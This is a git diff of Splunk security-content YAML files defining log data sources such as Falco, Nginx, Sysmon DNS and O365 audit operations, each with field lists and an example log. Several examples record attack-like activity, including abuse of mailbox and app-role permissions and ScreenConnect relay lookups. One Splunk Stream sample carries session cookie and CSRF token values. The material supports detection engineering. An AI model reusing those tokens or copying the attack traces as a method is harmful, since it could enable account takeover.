+example_log: '{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
+  (darwin/arm64) kubernetes/7f6f68f","objectRef":{"resource":"jobs","namespace":"test2","apiGroup":"batch","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"jobs.batch
+  is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
+  \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"responseObject":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"jobs.batch
+  is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
+  \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"requestReceivedTimestamp":"2023-12-07T14:44:53.358394Z","stageTimestamp":"2023-12-07T14:44:53.375985Z","annotations":{"authorization.k8s.io/decision":"forbid","authorization.k8s.io/reason":""}}'
diff --git a/data_sources/kubernetes_falco.yml b/data_sources/kubernetes_falco.yml
new file mode 100644
index 0000000000..731a1915c8
--- /dev/null
+++ b/data_sources/kubernetes_falco.yml
@@ -0,0 +1,50 @@
+name: Kubernetes Falco
+id: 23c0eeed-840a-4711-a41b-6819c1ffbba5
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Kubernetes Falco
+source: kubernetes
+sourcetype: kube:container:falco
+supported_TA:
+- {}
+fields:
+- _time
+- command
+- container_id
+- container_image
+- container_image_tag
+- container_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- evt_type
+- exe_flags
+- host
+- index
+- k8s_ns
+- k8s_pod_name
+- linecount
+- parent
+- proc_exepath
+- process
+- punct
+- source
+- sourcetype
+- splunk_server
+- terminal
+- timeendpos
+- timestartpos
+- user
+- user_loginuid
+- user_uid
+example_log: '12:18:18.691725165: Notice A shell was spawned in a container with an
+  attached terminal (evt_type=execve user=root user_uid=0 user_loginuid=-1 process=bash
+  proc_exepath=/usr/lib/splunk-otel-collector/agent-bundle/bin/bash parent=runc command=bash
+  -il terminal=34816 exe_flags=EXE_WRITABLE container_id=7a2566e8e462 container_image=quay.io/signalfx/splunk-otel-collector
+  container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)'
diff --git a/data_sources/endpoint/Linux_Secure.yml b/data_sources/linux_secure.yml
similarity index 87%
rename from data_sources/endpoint/Linux_Secure.yml
rename to data_sources/linux_secure.yml
index 3fc0cf8b13..03bdd2458e 100644
--- a/data_sources/endpoint/Linux_Secure.yml
+++ b/data_sources/linux_secure.yml
@@ -1,10 +1,13 @@
 name: Linux Secure
 id: 9a47d88b-1b17-49ce-a0ef-b440ddbd98bb
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Linux Secure
 source: /var/log/secure
 sourcetype: linux_secure
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
 fields:
 - _time
 - action
diff --git a/data_sources/network/Nginx_Access.yml b/data_sources/network/Nginx_Access.yml
deleted file mode 100644
index 55424506f6..0000000000
--- a/data_sources/network/Nginx_Access.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-name: Nginx Access
-id: c716a418-eab3-4df5-9dff-5420174e3068
-author: Patrick Bareiss, Splunk
-source: /var/log/nginx/access.log
-sourcetype: nginx:plus:kv
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - action
-  - app
-  - bytes
-  - bytes_in
-  - bytes_out
-  - category
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - dest_ip
-  - dest_port
-  - eventtype
-  - host
-  - http_content_type
-  - http_method
-  - http_referer
-  - http_user_agent
-  - http_user_agent_length
-  - http_x_forwarded_for
-  - http_x_header
-  - https
-  - index
-  - linecount
-  - nginx_version
-  - product
-  - protocol
-  - punct
-  - request_time
-  - response_time
-  - server
-  - site
-  - source
-  - sourcetype
-  - splunk_server
-  - src
-  - src_ip
-  - status
-  - status_description
-  - status_type
-  - tag
-  - tag::eventtype
-  - time_local
-  - timeendpos
-  - timestartpos
-  - uri_path
-  - url
-  - url_domain
-  - url_length
-  - vendor
-  - vendor_product
-  - version
-  - web_server
-example_log:
-  site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
-  src="198.51.100.1" src_ip="198.51.100.1" user="-" time_local="22/Feb/2024:13:00:00
-  -0500" protocol="HTTP/1.1" status="200" bytes_out="1073741000" bytes_in="234" http_referer="-"
-  http_user_agent="python-requests/2.25.1" nginx_version="1.18.0" http_x_forwarded_for="-"
-  http_x_header="-" uri_query="-" uri_path="/wp-json/bricks/v1/render_element" http_method="POST"
-  response_time="0.250" cookie="-" request_time="0.650" category="application/json"
-  https="on"
diff --git a/data_sources/network/Splunk_Stream_HTTP.yml b/data_sources/network/Splunk_Stream_HTTP.yml
deleted file mode 100644
index 06a510248e..0000000000
--- a/data_sources/network/Splunk_Stream_HTTP.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-name: Splunk Stream HTTP
-id: b12f601c-7f66-4d31-ab3c-a9ab03a597d5
-author: Patrick Bareiss, Splunk
-source: stream
-sourcetype: stream:http
-supported_TA:
-  name: Splunk App for Stream
-  version: 8.1.1
-  url: https://splunkbase.splunk.com/app/1809
-event_names: []
-fields:
-  - _time
-  - bytes
-  - bytes_in
-  - bytes_out
-  - cookie
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest_ip
-  - dest_mac
-  - dest_port
-  - endtime
-  - flow_id
-  - form_data
-  - host
-  - http_comment
-  - http_content_length
-  - http_content_type
-  - http_method
-  - http_user_agent
-  - index
-  - linecount
-  - protocol_stack
-  - punct
-  - request
-  - server
-  - site
-  - source
-  - sourcetype
-  - splunk_server
-  - src_ip
-  - src_mac
-  - src_port
-  - status
-  - time_taken
-  - timeendpos
-  - timestamp
-  - timestartpos
-  - transport
-  - uri_path
-example_log:
-  '{"endtime":"2021-04-21T08:12:01.084527Z","timestamp":"2021-04-21T08:12:01.082573Z","bytes":1674,"bytes_in":914,"bytes_out":760,"cookie":"session_id_8000=81beacd6cc82670cf51f101406b6f2e6dc00c023;
-  splunkweb_csrf_token_8000=13513429838815417873; splunkd_8000=K_rZQa3n41JuL47HXxuyhPs6Uyg8ERiczX9k1NeOAcgeh5ujYRYXTZsScYZFpzbKV4a8q62CvlhCbXYeAHI6vhsEyaR4vE9Rzdq7Mt25A4QrsqooUEcqB_u5bptLgvpr^z1FCN","dest_ip":"10.0.1.12","dest_mac":"02:DA:73:7B:81:70","dest_port":8000,"flow_id":"b18ec342-0a3b-4fb6-b91e-a7b576687fd7","form_data":"output_mode=json&action=touch","http_comment":"HTTP/1.1
-  200 OK","http_content_length":59,"http_content_type":"application/json; charset=UTF-8","http_method":"POST","http_user_agent":"Mozilla/5.0
-  (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128
-  Safari/537.36","protocol_stack":"ip:tcp:http","request":"POST /en-GB/splunkd/__raw/servicesNS/nobody/search/search/jobs/1618989993.8/control
-  HTTP/1.1","server":"Splunkd","site":"18.193.215.146:8000","src_ip":"46.128.24.64","src_mac":"02:AC:9D:85:B5:68","src_port":50021,"status":200,"time_taken":1954,"transport":"tcp","uri_path":"/en-GB/splunkd/__raw/servicesNS/nobody/search/search/jobs/1618989993.8/control"}'
diff --git a/data_sources/network/Sysmon_EventID.yml b/data_sources/network/Sysmon_EventID.yml
deleted file mode 100644
index d2234f2d24..0000000000
--- a/data_sources/network/Sysmon_EventID.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: Sysmon EventID
-id: 4e1d2852-0311-45fa-9162-0316fc39d2da
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
-sourcetype: XmlWinEventLog
-separator: EventID
-supported_TA:
-  name: Splunk Add-on for Sysmon
-  version: 4.0.0
-  url: https://splunkbase.splunk.com/app/5709/
-event_names:
-- event_name: Sysmon EventID 22
-  data_source: data_sources/network/event_sources/Sysmon_EventID_22.yml
diff --git a/data_sources/network/event_sources/Sysmon_EventID_22.yml b/data_sources/network/event_sources/Sysmon_EventID_22.yml
deleted file mode 100644
index 7bd38df2d0..0000000000
--- a/data_sources/network/event_sources/Sysmon_EventID_22.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: Sysmon EventID 22
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- QueryName
-- QueryResults
-- QueryStatus
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- answer
-- answer_count
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- process_exec
-- process_guid
-- process_name
-- punct
-- query
-- query_count
-- record_type
-- reply_code_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_product
-example_log: '<Event xmlns=''http://schemas.microsoft.com/win/2004/08/events/event''><System><Provider Name=''Microsoft-Windows-Sysmon'' Guid=''{5770385F-C22A-43E0-BF4C-06F5698FFBD9}''/><EventID>22</EventID><Version>5</Version><Level>4</Level><Task>22</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime=''2024-02-22T17:32:32.060332800Z''/><EventRecordID>566335</EventRecordID><Correlation/><Execution ProcessID=''2508'' ThreadID=''4484''/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>AttackBox-Win10</Computer><Security UserID=''S-1-5-18''/></System><EventData><Data Name=''RuleName''>-</Data><Data Name=''UtcTime''>2023-11-10 15:13:31.392</Data><Data Name=''ProcessGuid''>{51A89197-852C-65D7-F805-000000001D00}</Data><Data Name=''ProcessId''>5632</Data><Data Name=''QueryName''>instance-ffx0xs-relay.screenconnect.com</Data><Data Name=''QueryStatus''>0</Data><Data Name=''QueryResults''>type:  5 server-nix3a88ddf7-relay.screenconnect.com;::ffff:147.28.146.44;</Data><Data Name=''Image''>C:\Users\VICTIM\AppData\Local\Apps\2.0\570TKK0R.QDR\28H545QZ.BH8\scre..tion_25b0fbb6ef7eb094_0017.0009_86a5358e17526f84\ScreenConnect.ClientService.exe</Data><Data Name=''User''>NT AUTHORITY\SYSTEM</Data></EventData></Event>'
diff --git a/data_sources/nginx_access.yml b/data_sources/nginx_access.yml
new file mode 100644
index 0000000000..0009ef0fea
--- /dev/null
+++ b/data_sources/nginx_access.yml
@@ -0,0 +1,77 @@
+name: Nginx Access
+id: c716a418-eab3-4df5-9dff-5420174e3068
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Nginx Access
+source: /var/log/nginx/access.log
+sourcetype: nginx:plus:kv
+supported_TA:
+- {}
+fields:
+- _time
+- action
+- app
+- bytes
+- bytes_in
+- bytes_out
+- category
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_ip
+- dest_port
+- eventtype
+- host
+- http_content_type
+- http_method
+- http_referer
+- http_user_agent
+- http_user_agent_length
+- http_x_forwarded_for
+- http_x_header
+- https
+- index
+- linecount
+- nginx_version
+- product
+- protocol
+- punct
+- request_time
+- response_time
+- server
+- site
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- status_description
+- status_type
+- tag
+- tag::eventtype
+- time_local
+- timeendpos
+- timestartpos
+- uri_path
+- url
+- url_domain
+- url_length
+- vendor
+- vendor_product
+- version
+- web_server
+example_log: site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
+  src="198.51.100.1" src_ip="198.51.100.1" user="-" time_local="22/Feb/2024:13:00:00
+  -0500" protocol="HTTP/1.1" status="200" bytes_out="1073741000" bytes_in="234" http_referer="-"
+  http_user_agent="python-requests/2.25.1" nginx_version="1.18.0" http_x_forwarded_for="-"
+  http_x_header="-" uri_query="-" uri_path="/wp-json/bricks/v1/render_element" http_method="POST"
+  response_time="0.250" cookie="-" request_time="0.650" category="application/json"
+  https="on"
diff --git a/data_sources/o365.yml b/data_sources/o365.yml
new file mode 100644
index 0000000000..ea48f23702
--- /dev/null
+++ b/data_sources/o365.yml
@@ -0,0 +1,13 @@
+name: O365
+id: b32de97d-0074-4cca-853c-db22c392b6c0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
diff --git a/data_sources/o365_add_app_role_assignment_grant_to_user_.yml b/data_sources/o365_add_app_role_assignment_grant_to_user_.yml
new file mode 100644
index 0000000000..85e1f044e9
--- /dev/null
+++ b/data_sources/o365_add_app_role_assignment_grant_to_user_.yml
@@ -0,0 +1,108 @@
+name: O365 Add app role assignment grant to user.
+id: ce1d7849-a1d2-47fd-b6eb-d7ef854a860c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add app role assignment grant to user.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- ClientIP
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- extended_properties
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID":
+  "10037FFEA938FB92", "Type": 3}, {"ID": "74658136-14ec-4630-ad9b-26e160ff0fc6", "Type":
+  2}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484",
+  "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "ActorIpAddress": "40.124.84.4", "AzureActiveDirectoryEventType": 1, "ClientIP":
+  "40.124.84.4", "CreationTime": "2021-01-19T22:21:39", "ExtendedProperties": [{"Name":
+  "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value":
+  "User"}], "Id": "8b9e5417-c310-4382-89da-c0f25c5c0576", "InterSystemsId": "85c80877-c529-4487-8f44-48760767cc6c",
+  "IntraSystemId": "6fc81447-9c94-4734-8bd7-307bb699c04e", "ModifiedProperties": [{"Name":
+  "AppRole.Id", "NewValue": "97edced9-9f34-4eef-9b49-84a5ebcd5167", "OldValue": ""},
+  {"Name": "AppRole.Value", "NewValue": "arn:aws:iam::111111111111:role/rodonmicrotestrole,arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft",
+  "OldValue": ""}, {"Name": "AppRole.DisplayName", "NewValue": "rodonmicrotestrole,rodsotoonmicrosoft",
+  "OldValue": ""}, {"Name": "User.ObjectID", "NewValue": "7646f1a9-620c-4630-b5e4-b02838be5562",
+  "OldValue": ""}, {"Name": "User.UPN", "NewValue": "vagrant@rodsoto.onmicrosoft.com",
+  "OldValue": ""}, {"Name": "User.PUID", "NewValue": "100320010972E450", "OldValue":
+  ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88",
+  "OldValue": ""}], "ObjectId": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88",
+  "Operation": "Add app role assignment grant to user.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID":
+  "ServicePrincipal_9fd10db9-dfe2-4d74-a724-c837eb8764d9", "Type": 2}, {"ID": "9fd10db9-dfe2-4d74-a724-c837eb8764d9",
+  "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Amazon Web Services (AWS)",
+  "Type": 1}, {"ID": "3e71560f-3e31-45ab-b439-46328fe55b88", "Type": 2}, {"ID": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88",
+  "Type": 4}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId":
+  "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/o365_add_app_role_assignment_to_service_principal_.yml b/data_sources/o365_add_app_role_assignment_to_service_principal_.yml
new file mode 100644
index 0000000000..84cd4673fc
--- /dev/null
+++ b/data_sources/o365_add_app_role_assignment_to_service_principal_.yml
@@ -0,0 +1,113 @@
+name: O365 Add app role assignment to service principal.
+id: 785ba57a-ba7b-474e-97c8-9474e6e00b3a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add app role assignment to service principal.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2024-02-08T21:49:53", "Id": "a6bee61d-8b3f-42e1-b4fa-778fb05c43ac",
+  "Operation": "Add app role assignment to service principal.", "OrganizationId":
+  "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 8, "ResultStatus": "Success",
+  "UserKey": "Not Available", "UserType": 4, "Version": 1, "Workload": "AzureActiveDirectory",
+  "ObjectId": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com",
+  "UserId": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+  (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:28:58 PST
+  2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\"}"},
+  {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties":
+  [{"Name": "AppRole.Id", "NewValue": "dc890d15-9560-4a4c-9b7f-a736ec74ec40", "OldValue":
+  ""}, {"Name": "AppRole.Value", "NewValue": "full_access_as_app", "OldValue": ""},
+  {"Name": "AppRole.DisplayName", "NewValue": "Use Exchange Web Services with full
+  access to all mailboxes", "OldValue": ""}, {"Name": "AppRoleAssignment.CreatedDateTime",
+  "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "AppRoleAssignment.LastModifiedDateTime",
+  "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "ServicePrincipal.ObjectID",
+  "NewValue": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "OldValue": ""}, {"Name": "ServicePrincipal.DisplayName",
+  "NewValue": "STRT_Oauth", "OldValue": ""}, {"Name": "ServicePrincipal.AppId", "NewValue":
+  "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "ServicePrincipal.Name",
+  "NewValue": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames",
+  "NewValue": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com",
+  "OldValue": ""}], "Actor": [{"ID": "LegacyTestOAuthApp", "Type": 1}, {"ID": "869dc64b-95b2-4003-8098-3ba39296ea46",
+  "Type": 2}, {"ID": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type":
+  2}, {"ID": "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type": 2}, {"ID": "ServicePrincipal",
+  "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId":
+  "ed53faec-49b5-444f-b6af-b928558ca433", "IntraSystemId": "00000000-0000-0000-0000-000000000000",
+  "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_8429eb5c-faeb-4ade-8eac-acc003790769",
+  "Type": 2}, {"ID": "8429eb5c-faeb-4ade-8eac-acc003790769", "Type": 2}, {"ID": "ServicePrincipal",
+  "Type": 2}, {"ID": "Office 365 Exchange Online", "Type": 1}, {"ID": "00000002-0000-0ff1-ce00-000000000000",
+  "Type": 2}, {"ID": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com",
+  "Type": 4}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/o365_add_mailboxpermission.yml b/data_sources/o365_add_mailboxpermission.yml
new file mode 100644
index 0000000000..c56bf31a15
--- /dev/null
+++ b/data_sources/o365_add_mailboxpermission.yml
@@ -0,0 +1,83 @@
+name: O365 Add-MailboxPermission
+id: 9c0babdb-bb15-449e-abba-0a9cdb3fc061
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add-MailboxPermission
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- AccessRights
+- AppId
+- ClientAppId
+- ClientIP
+- CreationTime
+- ExternalAccess
+- Id
+- Identity
+- InheritanceType
+- ObjectId
+- Operation
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- Parameters{}.Name
+- Parameters{}.Value
+- RecordType
+- ResultStatus
+- SessionId
+- User
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.159.234.121:30395",
+  "CreationTime": "2020-12-15T10:18:53", "ExternalAccess": false, "Id": "bb6e31a3-e98f-493d-bbff-08d8a0e2d2b0",
+  "ObjectId": "jhernan", "Operation": "Add-MailboxPermission", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+  "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341
+  (15.20.3654.025)", "Parameters": [{"Name": "Identity", "Value": "jhernan"}, {"Name":
+  "User", "Value": "Patrick Bareiss"}, {"Name": "AccessRights", "Value": "FullAccess"},
+  {"Name": "InheritanceType", "Value": "All"}], "RecordType": 1, "ResultStatus": "True",
+  "SessionId": "2be46662-a743-4a05-8744-c2f75f886512", "UserId": "pbareiss@rodsoto.onmicrosoft.com",
+  "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/o365_add_member_to_role_.yml b/data_sources/o365_add_member_to_role_.yml
new file mode 100644
index 0000000000..09fc920144
--- /dev/null
+++ b/data_sources/o365_add_member_to_role_.yml
@@ -0,0 +1,106 @@
+name: O365 Add member to role.
+id: 8b949f7c-4b5d-404f-9694-d7403c4ec096
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add member to role.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+  url: https://splunkbase.splunk.com/app/4055
+  version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
